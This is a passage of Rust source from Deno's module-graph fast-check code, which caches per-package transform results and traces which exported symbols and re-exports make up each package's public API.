        package.module_ranges,
        root_symbol,
        graph,
        options,
        &mut errors,
        &mut fast_check_modules,
      );
      // fill the cache
      if let Some(fast_check_cache) = fast_check_cache {
        let mut package_cache_items =
          Vec::with_capacity(fast_check_modules.len() + errors.len());
        for (specifier, module_result) in &fast_check_modules {
          // hash of the module's source so a stale cache entry can be
          // detected later; 0 when the source is unavailable
          let source_hash = graph
            .get(specifier)
            .and_then(|m| m.source())
            .map(|s| fast_insecure_hash(s.as_bytes()))
            .unwrap_or(0);
          // `errors` is package-wide and loop-invariant here: when any
          // module in the package errored, every module is cached as a
          // diagnostic entry
          if errors.is_empty() {
            let module = module_result.as_ref().ok().unwrap();
            package_cache_items.push((
              specifier.clone(),
              FastCheckCacheModuleItem::Info(FastCheckCacheModuleItemInfo {
                source_hash,
                module_info: serde_json::to_string(&module.module_info)
                  .unwrap(),
                text: module.text.clone(),
                source_map: module.source_map.clone(),
              }),
            ));
          } else {
            package_cache_items.push((
              specifier.clone(),
              FastCheckCacheModuleItem::Diagnostic(
                FastCheckCacheModuleItemDiagnostic { source_hash },
              ),
            ));
          }
        }
        // also record the modules that only produced errors
        for error in &errors {
          let specifier = error.specifier();
          let source_hash = graph
            .get(specifier)
            .and_then(|m| m.source())
            .map(|s| fast_insecure_hash(s.as_bytes()))
            .unwrap_or(0);
          package_cache_items.push((
            specifier.clone(),
            FastCheckCacheModuleItem::Diagnostic(
              FastCheckCacheModuleItemDiagnostic { source_hash },
            ),
          ));
        }
        let cache_key = FastCheckCacheKey::build(
          fast_check_cache.hash_seed(),
          &nv,
          &package.entrypoints,
        );
        fast_check_cache.set(
          cache_key,
          FastCheckCacheItem {
            dependencies: package.dependencies,
            modules: package_cache_items,
          },
        );
      }
      if errors.is_empty() {
        final_result.extend(fast_check_modules);
      }
    } else {
      // use the items from the cache
      final_result.extend(package.cache_items);
    }
    if !errors.is_empty() {
      // If there are errors, insert a copy into each entrypoint.
      //
      // If one entrypoint can't be analyzed then we consider all
      // entrypoints are non-analyzable because it's very difficult
      // to determine the overlap of internal types between entrypoints.
      for entrypoint in package.entrypoints {
        final_result.push((entrypoint, Err(errors.clone())));
      }
    }
  }
  final_result
}
/// Runs the fast check transform over every public module of a single
/// package, appending successful modules to `fast_check_modules` and
/// diagnostics to `errors`.
#[cfg(feature = "fast_check")]
fn transform_package(
  package_module_ranges: indexmap::IndexMap<
    ModuleSpecifier,
    self::range_finder::ModulePublicRanges,
  >,
  root_symbol: &crate::symbols::RootSymbol<'_>,
  graph: &crate::ModuleGraph,
  options: &TransformOptions<'_>,
  errors: &mut Vec<FastCheckDiagnostic>,
  fast_check_modules: &mut Vec<(
    url::Url,
    Result<FastCheckModule, Vec<FastCheckDiagnostic>>,
  )>,
) {
  for (specifier, mut ranges) in package_module_ranges {
    // diagnostics gathered during range finding take precedence over
    // attempting the transform
    let diagnostics = ranges.take_diagnostics();
    let transform_result = if diagnostics.is_empty() {
      let module_info = root_symbol
        .module_from_specifier(&specifier)
        .unwrap_or_else(|| panic!("module not found: {}", specifier));
      if let Some(module_info) = module_info.esm() {
        transform::transform(graph, module_info, &ranges, options).map(Some)
      } else {
        Ok(None) // nothing to transform
      }
    } else {
      Err(diagnostics)
    };
    match transform_result {
      Ok(Some(module)) => {
        // once any module in the package has errored, successful modules
        // are no longer collected (the package result will be the errors)
        if errors.is_empty() {
          fast_check_modules.push((specifier.clone(), Ok(module)));
        }
      }
      Ok(None) => {
        // skip
      }
      Err(d) => {
        // don't clear the fast_check_modules here because we still
        // use that to construct the package's cache items
        errors.extend(d);
        if options.should_error_on_first_diagnostic {
          return; // no need to continue analyzing the package
        }
      }
    }
  }
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
// Copyright 2018-2024 the Deno authors. MIT license.
use std::borrow::Cow;
use std::collections::BTreeSet;
use std::collections::HashMap;
use std::collections::HashSet;
use std::collections::VecDeque;
use std::sync::Arc;
use deno_ast::SourceRange;
use deno_ast::SourceRangedForSpanned;
use deno_ast::swc::ast::Expr;
use deno_semver::package::PackageNv;
use indexmap::IndexMap;
use url::Url;
use super::FastCheckCache;
use super::FastCheckCacheItem;
use super::FastCheckCacheKey;
use super::FastCheckDiagnosticRange;
use super::FastCheckModule;
use crate::ModuleGraph;
use crate::ModuleSpecifier;
use crate::WorkspaceMember;
use crate::source::JsrUrlProvider;
use crate::symbols::FileDepName;
use crate::symbols::ModuleInfoRef;
use crate::symbols::ResolveDepsMode;
use crate::symbols::ResolvedExportOrReExportAllPath;
use crate::symbols::RootSymbol;
use crate::symbols::SymbolDeclKind;
use crate::symbols::SymbolId;
use crate::symbols::SymbolNodeDep;
use crate::symbols::SymbolNodeRef;
use super::FastCheckDiagnostic;
use super::cache::fast_insecure_hash;
/// A set of export names where each name maps to either all of its members
/// (`Exports::All`) or a nested subset of them (for qualified accesses like
/// `a.b.c`). Insertion order is preserved via `IndexMap`.
#[derive(Default, Debug, Clone, PartialEq, Eq)]
struct NamedSubset(IndexMap<String, Exports>);
impl NamedSubset {
  /// Builds a subset from a qualified name path, e.g. `["a", "b"]`
  /// becomes `{ "a": { "b": All } }`. An empty path yields an empty subset.
  pub fn from_parts(parts: &[String]) -> Self {
    let mut exports = Self::default();
    if let Some((first, rest)) = parts.split_first() {
      exports.add_qualified(first.to_string(), rest);
    }
    exports
  }
  /// Marks `export` as fully used (all of its members).
  pub fn add(&mut self, export: String) {
    // `IndexMap::insert` replaces the value of an existing key in place
    // (preserving insertion order), so the previous manual occupied/vacant
    // entry match collapses to a single insert.
    self.0.insert(export, Exports::All);
  }
  /// Marks the member path `qualified` under `export_name` as used, or the
  /// whole export when `qualified` is empty.
  pub fn add_qualified(&mut self, export_name: String, qualified: &[String]) {
    if qualified.is_empty() {
      self.add(export_name);
    } else {
      let entry = self.0.entry(export_name).or_insert_with(Exports::subset);
      if matches!(entry, Exports::All) {
        // already fully included; a qualified path adds nothing
        return;
      }
      entry.add_qualified(&qualified[0], &qualified[1..]);
    }
  }
  /// Merges `exports` into the entry for `export`, inserting when absent.
  /// Unlike `extend`, any difference produced by the merge is discarded.
  pub fn add_named(&mut self, export: String, exports: Exports) {
    match self.0.entry(export) {
      indexmap::map::Entry::Occupied(mut entry) => {
        entry.get_mut().extend(exports);
      }
      indexmap::map::Entry::Vacant(entry) => {
        entry.insert(exports);
      }
    }
  }
  /// Merges `new_subset` into `self` and returns only the entries that were
  /// not already covered — i.e. what still needs to be traced.
  pub fn extend(&mut self, new_subset: NamedSubset) -> NamedSubset {
    let mut difference = NamedSubset::default();
    for (key, exports) in new_subset.0 {
      if let Some(entry) = self.0.get_mut(&key) {
        let sub_diff = entry.extend(exports);
        if let Some(sub_diff) = sub_diff {
          difference.add_named(key.clone(), sub_diff);
        }
      } else {
        difference.add_named(key.clone(), exports.clone());
        self.0.insert(key, exports);
      }
    }
    difference
  }
}
/// What portion of a single export is used: everything, or a named
/// subset of its members.
#[derive(Debug, Clone, PartialEq, Eq)]
enum Exports {
  All,
  Subset(NamedSubset),
}
impl Exports {
  /// Creates an empty named subset.
  pub fn subset() -> Self {
    Self::Subset(Default::default())
  }
  /// Adds the member path `qualified` under `export_name`.
  /// A no-op when this is already `Exports::All`.
  pub fn add_qualified(&mut self, export_name: &str, qualified: &[String]) {
    let Exports::Subset(inner) = self else {
      return;
    };
    inner.add_qualified(export_name.to_string(), qualified)
  }
  /// Merges `new_named` into `self`, returning only what was newly added
  /// (`None` when everything was already covered).
  pub fn extend(&mut self, new_named: Exports) -> Option<Exports> {
    // bind the inner subset directly (previously this took `&mut` of the
    // match result, producing a redundant `&mut &mut NamedSubset`)
    let current_subset = match self {
      // `All` already covers anything that could be added
      Exports::All => return None,
      Exports::Subset(inner) => inner,
    };
    match new_named {
      Exports::All => {
        *self = Exports::All;
        Some(Exports::All)
      }
      Exports::Subset(new_subset) => {
        let difference = current_subset.extend(new_subset);
        if difference.0.is_empty() {
          None
        } else {
          Some(Exports::Subset(difference))
        }
      }
    }
  }
}
/// Which exports of a module are imported: all named exports (`Star`),
/// all named exports plus the default export (`StarWithDefault`), or an
/// explicit subset.
#[derive(Debug, Clone)]
enum ImportedExports {
  Star,
  StarWithDefault,
  Subset(NamedSubset),
}
impl ImportedExports {
  /// Builds the imported-exports set for a single file dependency name.
  pub(crate) fn from_file_dep_name(dep_name: &FileDepName) -> Self {
    match dep_name {
      FileDepName::Star => ImportedExports::Star,
      FileDepName::Name(value) => {
        let mut named_exports = NamedSubset::default();
        named_exports.add(value.clone());
        ImportedExports::Subset(named_exports)
      }
    }
  }
  pub fn star_with_default() -> ImportedExports {
    ImportedExports::StarWithDefault
  }
  pub fn star() -> ImportedExports {
    ImportedExports::Star
  }
  pub fn subset(named: NamedSubset) -> ImportedExports {
    ImportedExports::Subset(named)
  }
  /// Adds the incoming exports to the existing exports and
  /// returns the newly added exports that have not previously
  /// been added.
  pub(crate) fn add(
    &mut self,
    exports_to_trace: ImportedExports,
  ) -> Option<ImportedExports> {
    match self {
      ImportedExports::Star => match exports_to_trace {
        // already tracing all named exports
        ImportedExports::Star => None,
        ImportedExports::StarWithDefault => {
          // upgrade; the only newly added piece is the default export
          // (implying `Star` does not include "default")
          *self = ImportedExports::StarWithDefault;
          let mut named_exports = NamedSubset::default();
          named_exports.add("default".to_string());
          Some(ImportedExports::Subset(named_exports))
        }
        // NOTE(review): a subset containing "default" is also swallowed
        // here, even though the arm above implies `Star` excludes the
        // default export — confirm this is intended.
        ImportedExports::Subset(_) => None,
      },
      // top of the lattice; nothing further can be added
      ImportedExports::StarWithDefault => None,
      ImportedExports::Subset(current_subset) => match exports_to_trace {
        ImportedExports::Star => {
          *self = ImportedExports::Star;
          Some(ImportedExports::Star)
        }
        ImportedExports::StarWithDefault => {
          *self = ImportedExports::StarWithDefault;
          Some(ImportedExports::StarWithDefault)
        }
        ImportedExports::Subset(new_subset) => {
          // NOTE(review): when the difference is empty this still returns
          // `Some` of an empty subset rather than `None`; presumably
          // callers tolerate tracing an empty set — confirm.
          Some(ImportedExports::Subset(current_subset.extend(new_subset)))
        }
      },
    }
  }
}
/// Tracks, per module, which imported exports have already been handled so
/// the same exports are not traced twice.
#[derive(Default)]
struct HandledExports(HashMap<ModuleSpecifier, ImportedExports>);
impl HandledExports {
  /// Records `traced_exports` for `dep_specifier` and returns only the
  /// portion that had not been handled before (`None` when everything was
  /// already covered). The key is cloned only on first insertion.
  pub fn add(
    &mut self,
    dep_specifier: &ModuleSpecifier,
    traced_exports: ImportedExports,
  ) -> Option<ImportedExports> {
    match self.0.get_mut(dep_specifier) {
      Some(existing) => existing.add(traced_exports),
      None => {
        self
          .0
          .insert(dep_specifier.clone(), traced_exports.clone());
        Some(traced_exports)
      }
    }
  }
}
/// Work queue of modules whose exports still need to be traced, keyed by
/// specifier (insertion-ordered via `IndexMap`).
#[derive(Default)]
struct PendingTraces(IndexMap<ModuleSpecifier, (PackageNv, ImportedExports)>);
impl PendingTraces {
  /// Queues `exports_to_trace` for `dep_specifier`, merging into any exports
  /// already pending for that module.
  pub fn add(
    &mut self,
    package_nv: PackageNv,
    dep_specifier: ModuleSpecifier,
    exports_to_trace: ImportedExports,
  ) {
    match self.0.get_mut(&dep_specifier) {
      Some((_, pending)) => {
        // the returned "newly added" portion is intentionally ignored here
        pending.add(exports_to_trace);
      }
      None => {
        self.0.insert(dep_specifier, (package_nv, exports_to_trace));
      }
    }
  }
  /// Pops the most recently queued trace, if any.
  pub fn pop(&mut self) -> Option<PendingTrace> {
    let (specifier, (package_nv, exports_to_trace)) = self.0.pop()?;
    Some(PendingTrace {
      package_nv,
      specifier,
      exports_to_trace,
    })
  }
}
/// A single unit of tracing work: which exports of which module (belonging
/// to which package) still need their public ranges found.
#[derive(Debug)]
struct PendingTrace {
  pub package_nv: PackageNv,
  pub specifier: ModuleSpecifier,
  pub exports_to_trace: ImportedExports,
}
/// Computes the public source ranges for every package reachable from
/// `pending_nvs`, optionally consulting `fast_check_cache` for reuse.
pub fn find_public_ranges<'a>(
  fast_check_cache: Option<&'a dyn FastCheckCache>,
  jsr_url_provider: &'a dyn JsrUrlProvider,
  graph: &'a ModuleGraph,
  root_symbol: &'a RootSymbol<'a>,
  workspace_members: &'a [WorkspaceMember],
  pending_nvs: VecDeque<PackageNv>,
) -> HashMap<PackageNv, PackagePublicRanges> {
  // everything initially queued counts as already seen so it
  // doesn't get re-queued while processing
  let seen_nvs = pending_nvs.iter().cloned().collect();
  let url_converter = RegistryUrlConverter {
    jsr_url_provider,
    workspace_members,
  };
  let finder = PublicRangeFinder {
    url_converter,
    graph,
    fast_check_cache,
    workspace_members,
    root_symbol,
    pending_nvs,
    pending_traces: Default::default(),
    traced_exports: Default::default(),
    seen_nvs,
    public_ranges: Default::default(),
  };
  finder.find()
}
/// The public source ranges discovered for a single module, plus any
/// fast-check diagnostics produced while tracing it.
#[derive(Debug, Default)]
pub struct ModulePublicRanges {
  ranges: HashSet<SourceRange>,
  impl_with_overload_ranges: HashSet<SourceRange>,
  diagnostics: Vec<FastCheckDiagnostic>,
}

impl ModulePublicRanges {
  /// Whether this range was found to be part of the public API.
  pub fn contains(&self, range: &SourceRange) -> bool {
    self.ranges.contains(range)
  }

  /// Whether this range is an implementation that has overloads.
  pub fn is_impl_with_overloads(&self, range: &SourceRange) -> bool {
    self.impl_with_overload_ranges.contains(range)
  }

  /// Removes and returns the collected diagnostics, leaving none behind.
  pub fn take_diagnostics(&mut self) -> Vec<FastCheckDiagnostic> {
    std::mem::replace(&mut self.diagnostics, Vec::new())
  }
}
/// Maps between package name/versions and registry URLs, preferring
/// local workspace members over the JSR url provider.
struct RegistryUrlConverter<'a> {
  jsr_url_provider: &'a dyn JsrUrlProvider,
  workspace_members: &'a [WorkspaceMember],
}

impl RegistryUrlConverter<'_> {
  /// Base URL for a package: the workspace member's base when one
  /// matches, otherwise the registry-provided URL.
  fn registry_package_url(&self, nv: &PackageNv) -> Url {
    let matching_member = self.workspace_members.iter().find(|m| {
      if m.name != nv.name {
        return false;
      }
      // a member without a version matches any version
      match m.version.as_ref() {
        Some(v) => v == &nv.version,
        None => true,
      }
    });
    match matching_member {
      Some(member) => member.base.clone(),
      None => self.jsr_url_provider.package_url(nv),
    }
  }

  /// Reverse lookup: which package does this URL belong to, if any?
  fn registry_package_url_to_nv(&self, url: &Url) -> Option<PackageNv> {
    if url.scheme() != "file" {
      return self.jsr_url_provider.package_url_to_nv(url);
    }
    // file urls can only come from workspace members
    self
      .workspace_members
      .iter()
      .find(|member| url.as_str().starts_with(member.base.as_str()))
      .map(|member| member.as_nv())
  }
}
/// All public-range information gathered for one package.
#[derive(Debug, Default)]
pub struct PackagePublicRanges {
  // resolved entrypoint urls derived from the package's exports
  pub entrypoints: BTreeSet<ModuleSpecifier>,
  // uses an IndexMap to maintain order so that when transforming
  // it goes over the modules in the exact same deterministic order
  pub module_ranges: IndexMap<ModuleSpecifier, ModulePublicRanges>,
  /// Items loaded from the cache. If set, these should be used over module_ranges.
  pub cache_items: Vec<(
    ModuleSpecifier,
    Result<FastCheckModule, Vec<FastCheckDiagnostic>>,
  )>,
  // packages this package was found to depend on during tracing
  pub dependencies: BTreeSet<PackageNv>,
}
/// Drives the public-range analysis: drains `pending_nvs` package by
/// package, tracing each package's exported symbols into `public_ranges`.
struct PublicRangeFinder<'a> {
  url_converter: RegistryUrlConverter<'a>,
  graph: &'a ModuleGraph,
  fast_check_cache: Option<&'a dyn FastCheckCache>,
  workspace_members: &'a [WorkspaceMember],
  root_symbol: &'a RootSymbol<'a>,
  // packages still to process
  pending_nvs: VecDeque<PackageNv>,
  // per-module traces queued while processing the current package
  pending_traces: PendingTraces,
  // which exports have already been traced, to avoid duplicate work
  traced_exports: HandledExports,
  // guards against re-queueing a package more than once
  seen_nvs: HashSet<PackageNv>,
  // accumulated results, returned by `find`
  public_ranges: HashMap<PackageNv, PackagePublicRanges>,
}
impl<'a> PublicRangeFinder<'a> {
  /// Processes every pending package, computing the public ranges for
  /// each of its modules (or reusing a valid fast-check cache entry),
  /// and returns the accumulated results.
  pub fn find(mut self) -> HashMap<PackageNv, PackagePublicRanges> {
    while let Some(nv) = self.pending_nvs.pop_front() {
      // resolve the package's exports from the graph, falling back to a
      // matching workspace member's exports
      let Some(exports) = self
        .graph
        .packages
        .package_exports(&nv)
        .map(Cow::Borrowed)
        .or_else(|| {
          Some(Cow::Owned(
            self
              .workspace_members
              .iter()
              .find(|m| {
                m.name == nv.name
                  && m
                    .version
                    .as_ref()
                    .map(|v| *v == nv.version)
                    .unwrap_or(true)
              })?
              .exports
              .iter()
              .map(|(k, v)| (k.clone(), v.clone()))
              .collect(),
          ))
        })
      else {
        // may happen in a segmented graph since graph
        // segmentation is not that smart at the moment
        continue;
      };
      let base_url = self.url_converter.registry_package_url(&nv);
      let entrypoints = exports
        .values()
        .map(|value| {
          // if we got this far, then the export must be valid, so we can unwrap
          base_url.join(value).unwrap()
        })
        .collect::<BTreeSet<_>>();
      // prefer a cached result when every recorded source hash still matches
      match self.try_get_cache_item(&nv, &entrypoints) {
        Some(mut public_ranges) => {
          log::debug!("Using FastCheck cache for: {}", nv);
          public_ranges.entrypoints = entrypoints;
          self.public_ranges.insert(nv, public_ranges);
        }
        _ => {
          let mut had_diagnostic = false;
          for specifier in &entrypoints {
            // check for untyped or non-existent entrypoints
            let diagnostic = if let Some(module) = self.graph.get(specifier) {
              if is_module_typed(module) {
                None
              } else {
                Some(FastCheckDiagnostic::UnsupportedJavaScriptEntrypoint {
                  specifier: specifier.clone(),
                })
              }
            } else {
              // should never happen
              Some(FastCheckDiagnostic::ExportNotFound {
                specifier: specifier.clone(),
              })
            };
            if let Some(diagnostic) = diagnostic {
              self
                .public_ranges
                .entry(nv.clone())
                .or_default()
                .module_ranges
                .entry(specifier.clone())
                .or_default()
                .diagnostics
                .push(diagnostic);
              had_diagnostic = true;
            }
          }
          // only trace when every entrypoint is usable
          if !had_diagnostic {
            for specifier in &entrypoints {
              self.add_pending_trace(
                &nv,
                specifier,
                ImportedExports::star_with_default(),
              );
            }
          }
          // drain the per-module worklist for this package (traces may
          // enqueue more traces as re-exports are discovered)
          while let Some(trace) = self.pending_traces.pop() {
            self.analyze_trace(&trace);
          }
          let public_ranges = self.public_ranges.entry(nv).or_default();
          public_ranges.entrypoints = entrypoints;
        }
      }
    }
    self.public_ranges
  }
  /// Attempts to load this package's fast check results from the cache.
  ///
  /// Returns `None` when caching is disabled, there is no entry, the entry
  /// is stale (a module's source hash changed), or stored module info
  /// fails to deserialize.
  fn try_get_cache_item(
    &mut self,
    nv: &PackageNv,
    entrypoints: &BTreeSet<ModuleSpecifier>,
  ) -> Option<PackagePublicRanges> {
    let fast_check_cache = self.fast_check_cache?;
    let cache_key =
      FastCheckCacheKey::build(fast_check_cache.hash_seed(), nv, entrypoints);
    let cache_item = fast_check_cache.get(cache_key)?;
    if !self.is_cache_item_valid(&cache_item) {
      return None;
    }
    // fill in the dependencies
    for dep in cache_item.dependencies {
      self.add_pending_nv_no_referrer(&dep)
    }
    // now fill in the entry
    let mut package = PackagePublicRanges::default();
    for (url, cache_item) in cache_item.modules {
      match cache_item {
        super::cache::FastCheckCacheModuleItem::Info(info) => {
          // module info is stored as JSON (see FastCheckCacheModuleItemInfo)
          let Ok(module_info) = serde_json::from_str(&info.module_info) else {
            return None;
          };
          package.cache_items.push((
            url,
            Ok(FastCheckModule {
              module_info: Arc::new(module_info),
              text: info.text,
              source_map: info.source_map,
              dts: None,
            }),
          ));
        }
        super::cache::FastCheckCacheModuleItem::Diagnostic(_) => {
          // the concrete diagnostic isn't cached, only the fact that
          // one occurred for this module
          package.cache_items.push((
            url.clone(),
            Err(vec![FastCheckDiagnostic::Cached { specifier: url }]),
          ));
        }
      }
    }
    Some(package)
  }
fn is_cache_item_valid(&self, cache_item: &FastCheckCacheItem) -> bool {
for (specifier, module_item) in &cache_item.modules {
let hash = self
.graph
.get(specifier)
.and_then(|m| m.source())
.map(|s| fast_insecure_hash(s.as_bytes()))
.unwrap_or(0);
if hash != module_item.source_hash() {
return false;
}
}
true
}
fn add_pending_trace(
&mut self,
nv: &PackageNv,
specifier: &ModuleSpecifier,
trace: ImportedExports,
) {
if let Some(trace) = self.traced_exports.add(specifier, trace) {
self
.pending_traces
.add(nv.clone(), specifier.clone(), trace);
}
}
fn add_pending_nv(&mut self, dep: &PackageNv, referrer_nv: &PackageNv) {
if dep == referrer_nv {
return;
}
// when a package is referenced then we need to analyze
// all the dependencies for it in the graph
let is_new_dep = self
.public_ranges
.entry(referrer_nv.clone())
.or_default()
.dependencies
.insert(dep.clone());
// if it's not a new dep then we've been here before
// so no reason to attempt this again
if is_new_dep {
self.add_pending_nv_no_referrer(dep);
}
}
fn add_pending_nv_no_referrer(&mut self, nv: &PackageNv) {
let never_seen = self.seen_nvs.insert(nv.clone());
if never_seen {
self.pending_nvs.push_back(nv.clone());
}
}
  /// Analyzes one pending trace: typed modules get their symbols traced,
  /// while non-external untyped (JavaScript) modules produce a diagnostic.
  fn analyze_trace(&mut self, trace: &PendingTrace) {
    log::trace!("Trace - {} - {:?}", trace.specifier, trace.exports_to_trace);

    let Some(module) = self.graph.get(&trace.specifier) else {
      // module missing from the graph — nothing to trace
      return;
    };
    if is_module_typed(module) {
      if let Some(module_info) =
        self.root_symbol.module_from_specifier(&trace.specifier)
      {
        self.analyze_module_info(trace, module_info);
      }
    } else if !is_module_external(module) {
      // untyped, non-external module: fast check can't analyze it
      let ranges = self
        .public_ranges
        .entry(trace.package_nv.clone())
        .or_default()
        .module_ranges
        .entry(trace.specifier.clone())
        .or_default();
      // if there are any diagnostics present then that means
      // we already inserted this diagnostic, so we can ignore
      // doing it again
      if ranges.diagnostics.is_empty() {
        ranges.diagnostics.push(
          FastCheckDiagnostic::UnsupportedNestedJavaScript {
            specifier: trace.specifier.clone(),
          },
        );
      }
    }
  }
fn analyze_module_info(
&mut self,
trace: &PendingTrace,
module_info: ModuleInfoRef<'a>,
) -> bool {
#[derive(Debug)]
enum PendingIdTrace {
Id {
symbol_id: SymbolId,
referrer_id: SymbolId,
},
QualifiedId {
symbol_id: SymbolId,
parts: NamedSubset,
referrer_id: SymbolId,
},
}
#[derive(Default)]
struct PendingTraces {
traces: VecDeque<PendingIdTrace>,
done_id_traces: HashSet<SymbolId>,
}
impl PendingTraces {
fn maybe_add_id_trace(
&mut self,
symbol_id: SymbolId,
referrer_id: SymbolId,
) {
// the referrer_id is only used for diagnostic purposes and we only
// care about the first diagnostic, so we can only take the symbol_id
// into account when checking if we should trace this
if self.done_id_traces.insert(symbol_id) {
self.traces.push_back(PendingIdTrace::Id {
symbol_id,
referrer_id,
});
}
}
}
let pkg_nv = &trace.package_nv;
let mut found_ranges = HashSet::new();
let mut impl_with_overload_ranges = HashSet::new();
let mut found = false;
let mut diagnostics = Vec::new();
let mut pending_traces = PendingTraces::default();
let module_symbol = module_info.module_symbol();
let include_default =
matches!(trace.exports_to_trace, ImportedExports::StarWithDefault);
match &trace.exports_to_trace {
ImportedExports::Star | ImportedExports::StarWithDefault => {
for (name, export_symbol_id) in module_info.module_symbol().exports() {
if name == "default" && !include_default {
continue;
}
pending_traces
.maybe_add_id_trace(*export_symbol_id, module_symbol.symbol_id());
}
// add all the specifiers to the list of pending specifiers
if let Some(re_export_all_nodes) = module_info.re_export_all_nodes() {
for re_export_all_node in re_export_all_nodes {
log::trace!(
"Found re-export all - {}",
re_export_all_node.src.value.to_string_lossy()
);
found_ranges.insert(re_export_all_node.span.range());
let specifier_text = re_export_all_node.src.value.to_string_lossy();
if let Some(dep_specifier) = self.graph.resolve_dependency(
&specifier_text,
module_info.specifier(),
/* prefer types */ true,
) {
// only analyze registry specifiers
if let Some(dep_nv) =
self.url_converter.registry_package_url_to_nv(dep_specifier)
{
self.add_pending_nv(&dep_nv, pkg_nv);
self.add_pending_trace(
&dep_nv,
dep_specifier,
ImportedExports::star(),
);
}
}
}
}
found = true;
}
ImportedExports::Subset(named_exports) => {
let mut named_exports = named_exports.0.clone();
let module_exports = module_info.module_symbol().exports();
for i in (0..named_exports.len()).rev() {
let (export_name, _) = named_exports.get_index(i).unwrap();
if let Some(export_symbol_id) = module_exports.get(export_name) {
let export_name = export_name.clone();
let named_exports =
named_exports.swap_remove(&export_name).unwrap();
match named_exports {
Exports::All => {
pending_traces.maybe_add_id_trace(
*export_symbol_id,
module_symbol.symbol_id(),
);
}
Exports::Subset(subset) => {
pending_traces
.traces
.push_back(PendingIdTrace::QualifiedId {
symbol_id: *export_symbol_id,
parts: subset,
referrer_id: module_symbol.symbol_id(),
});
}
}
}
}
if !named_exports.is_empty()
&& let Some(re_export_all_nodes) = module_info.re_export_all_nodes()
{
for re_export_all_node in re_export_all_nodes {
if named_exports.is_empty() {
break; // all done
}
let specifier_text = re_export_all_node.src.value.to_string_lossy();
if let Some(dep_specifier) = self.graph.resolve_dependency(
&specifier_text,
module_info.specifier(),
/* prefer types */ true,
) && let Some(module_info) =
self.root_symbol.module_from_specifier(dep_specifier)
{
let module_exports = module_info.exports(self.root_symbol);
for i in (0..named_exports.len()).rev() {
let (export_name, _) = named_exports.get_index(i).unwrap();
if let Some(export_path) =
module_exports.resolved.get(export_name)
{
if found_ranges.insert(re_export_all_node.span.range()) {
log::trace!(
"Found re-export all - {}",
re_export_all_node.src.value.to_string_lossy()
);
}
let export_name = export_name.clone();
let named_exports =
named_exports.swap_remove(&export_name).unwrap();
let module = match export_path {
ResolvedExportOrReExportAllPath::Export(e) => e.module,
ResolvedExportOrReExportAllPath::ReExportAllPath(p) => {
p.referrer_module
}
};
if let Some(nv) = self
.url_converter
.registry_package_url_to_nv(module.specifier())
{
let mut new_named_exports = NamedSubset::default();
new_named_exports.0.insert(export_name, named_exports);
self.add_pending_trace(
&nv,
module.specifier(),
ImportedExports::subset(new_named_exports),
);
}
}
}
}
}
if !named_exports.is_empty() {
// in this case, include all re_export all ranges because
// we couldn't determine a named export
if let Some(re_export_all_nodes) = module_info.re_export_all_nodes()
{
for re_export_all_node in re_export_all_nodes {
log::trace!(
"Found re-export all - {}",
re_export_all_node.src.value.to_string_lossy()
);
found_ranges.insert(re_export_all_node.span.range());
}
}
}
}
}
}
while let Some(trace) = pending_traces.traces.pop_front() {
match trace {
PendingIdTrace::Id {
symbol_id,
referrer_id: trace_referrer_id,
} => {
let symbol = module_info.symbol(symbol_id).unwrap();
if symbol.is_private_member() {
if Some(trace_referrer_id) != symbol.parent_id() {
diagnostics.push(
FastCheckDiagnostic::UnsupportedPrivateMemberReference {
range: FastCheckDiagnosticRange {
specifier: module_info.specifier().clone(),
range: symbol.decls()[0].range,
text_info: module_info.text_info().clone(),
},
name: module_info
.fully_qualified_symbol_name(symbol)
.unwrap_or_else(|| "<unknown>".to_string()),
referrer: module_info
.symbol(trace_referrer_id)
.and_then(|symbol| {
module_info.fully_qualified_symbol_name(symbol)
})
.unwrap_or_else(|| "<unknown>".to_string()),
},
);
}
continue;
}
for decl in symbol.decls() {
log::trace!(
"Found decl - {}",
decl.maybe_name().unwrap_or(Cow::Borrowed("<no-name>"))
);
found_ranges.insert(decl.range);
if decl.has_overloads() && decl.has_body() {
impl_with_overload_ranges.insert(decl.range);
continue;
}
let referrer_id = symbol_id;
match &decl.kind {
SymbolDeclKind::Target(id) => {
if let Some(symbol_id) =
module_info.esm().and_then(|m| m.symbol_id_from_swc(id))
{
pending_traces.maybe_add_id_trace(symbol_id, referrer_id);
}
}
SymbolDeclKind::QualifiedTarget(id, parts) => {
if let Some(symbol_id) =
module_info.esm().and_then(|m| m.symbol_id_from_swc(id))
{
pending_traces.traces.push_back(
PendingIdTrace::QualifiedId {
symbol_id,
parts: NamedSubset::from_parts(parts),
referrer_id,
},
);
}
}
SymbolDeclKind::FileRef(file_dep) => {
if let Some(specifier) = self.graph.resolve_dependency(
&file_dep.specifier,
module_info.specifier(),
/* prefer types */ true,
) && let Some(dep_nv) =
self.url_converter.registry_package_url_to_nv(specifier)
{
if dep_nv == *pkg_nv {
// just add this specifier
self.add_pending_trace(
&dep_nv,
specifier,
ImportedExports::from_file_dep_name(&file_dep.name),
);
} else {
// need to analyze the whole package
self.add_pending_nv(&dep_nv, pkg_nv);
}
}
}
SymbolDeclKind::Definition(node) => {
if let Some(node) = node.maybe_ref() {
// if the node is a class or interface member, ensure its parent is traced
if node.is_member()
&& let Some(parent_id) = symbol.parent_id()
{
// don't add the parent if we analyzed this node from the parent
if trace_referrer_id != parent_id {
pending_traces.maybe_add_id_trace(parent_id, referrer_id);
}
}
// functions may contain expando property exports that are
// outside the range of the function, so include those as
// part of the found ranges
if node.is_function() {
for export_id in symbol.exports().values() {
let export_symbol =
module_info.symbol(*export_id).unwrap();
for export_decl in export_symbol.decls() {
if !decl.range.contains(&export_decl.range) {
log::trace!(
"Found expando property - {}",
export_decl
.maybe_name()
.unwrap_or(Cow::Borrowed("<no-name>"))
);
found_ranges.insert(export_decl.range);
}
}
}
}
for dep in node.deps(ResolveDepsMode::TypesAndExpressions) {
match dep {
SymbolNodeDep::Id(id) => {
let module_info = module_info.esm().unwrap();
if let Some(symbol_id) =
module_info.symbol_id_from_swc(&id)
{
pending_traces
.maybe_add_id_trace(symbol_id, referrer_id);
}
}
SymbolNodeDep::QualifiedId(id, parts) => {
let module_info = module_info.esm().unwrap();
if let Some(symbol_id) =
module_info.symbol_id_from_swc(&id)
{
pending_traces.traces.push_back(
PendingIdTrace::QualifiedId {
symbol_id,
parts: NamedSubset::from_parts(&parts),
referrer_id,
},
);
}
}
SymbolNodeDep::ImportType(specifier, parts) => {
if let Some(specifier) = self.graph.resolve_dependency(
&specifier,
module_info.specifier(),
